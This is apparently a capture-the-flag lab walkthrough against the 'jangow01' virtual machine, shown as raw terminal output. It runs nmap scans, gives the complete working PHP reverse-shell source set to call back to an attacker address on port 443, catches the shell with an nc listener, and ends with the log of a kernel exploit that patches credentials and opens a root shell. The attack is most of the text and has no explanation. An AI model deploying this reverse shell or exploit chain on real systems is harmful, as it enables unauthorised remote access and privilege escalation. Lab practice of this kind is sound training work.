Starting Nmap 7.92(<https://nmap.org>) at 2022-04-02 15:07 CST
Nmap scan report for192.168.0.1
Host is up (0.00042s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for192.168.0.101
Host is up (0.055s latency).
MAC Address: 62:95:C5:46:4A:54 (Unknown)
Nmap scan report for192.168.0.102
Host is up (0.17s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for192.168.0.103
Host is up (0.19s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for192.168.0.107
Host is up (0.20s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for192.168.0.110
Host is up (0.00017s latency).
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in3.37 seconds
$ sudo nmap -sV -sC -A 192.168.0.110
Starting Nmap 7.92(<https://nmap.org>) at 2022-04-02 15:07 CST
Nmap scan report for192.168.0.110
Host is up (0.00029s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp openftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix
TRACEROUTE
HOP RTT ADDRESS
10.29 ms 192.168.0.110
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/>.
Nmap done: 1 IP address (1host up) scanned in16.47 seconds
<?php// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php// Copyright (C) 2007 pentestmonkey@pentestmonkey.netset_time_limit(0);$VERSION="1.0";$ip='192.168.0.104';$port=443;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; sh -i';$daemon=0;$debug=0;if(function_exists('pcntl_fork')){$pid=pcntl_fork();if($pid==-1){printit("ERROR: Can't fork");exit(1);}if($pid){exit(0);// Parent exits}if(posix_setsid()==-1){printit("Error: Can't setsid()");exit(1);}$daemon=1;}else{printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}chdir("/");umask(0);// Open reverse connection$sock=fsockopen($ip,$port,$errno,$errstr,30);if(!$sock){printit("$errstr ($errno)");exit(1);}$descriptorspec=array(0=>array("pipe","r"),// stdin is a pipe that the child will read from1=>array("pipe","w"),// stdout is a pipe that the child will write to2=>array("pipe","w")// stderr is a pipe that the child will write to);$process=proc_open($shell,$descriptorspec,$pipes);if(!is_resource($process)){printit("ERROR: Can't spawn shell");exit(1);}stream_set_blocking($pipes[0],0);stream_set_blocking($pipes[1],0);stream_set_blocking($pipes[2],0);stream_set_blocking($sock,0);printit("Successfully opened reverse shell to $ip:$port");while(1){if(feof($sock)){printit("ERROR: Shell connection terminated");break;}if(feof($pipes[1])){printit("ERROR: Shell process terminated");break;}$read_a=array($sock,$pipes[1],$pipes[2]);$num_changed_sockets=stream_select($read_a,$write_a,$error_a,null);if(in_array($sock,$read_a)){if($debug)printit("SOCK READ");$input=fread($sock,$chunk_size);if($debug)printit("SOCK: $input");fwrite($pipes[0],$input);}if(in_array($pipes[1],$read_a)){if($debug)printit("STDOUT READ");$input=fread($pipes[1],$chunk_size);if($debug)printit("STDOUT: $input");fwrite($sock,$input);}if(in_array($pipes[2],$read_a)){if($debug)printit("STDERR READ");$input=fread($pipes[2],$chunk_size);if($debug)printit("STDERR: $input");fwrite($sock,$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);functionprintit($string){if(!$daemon){print"$string\n";}}?>
sudonc -lvnp 443
listening on [any]443...
connect to [192.168.0.104] from (UNKNOWN)[192.168.0.110]34204
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux13:05:30 up 59 min, 0 users, load average: 0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data)gid=33(www-data)groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/$ uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
www-data@jangow01:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
[.][.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)[.][.] **This vulnerability cannot be exploited at all on authentic grsecurity kernel**
[.][*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035959c00
[*] Leaking sock struct from ffff8800381252c0
[*] Sock->sk_rcvtimeo at offset 472[*] Cred structure at ffff88003ad06e40
[*]UID from cred structure: 33, matches the current: 33[*] hammering cred structure at ffff88003ad06e40
[*] credentials patched, launching shell...
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-04-02 15:07 CSTNmap scan report for 192.168.0.1Host is up (0.00042s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan r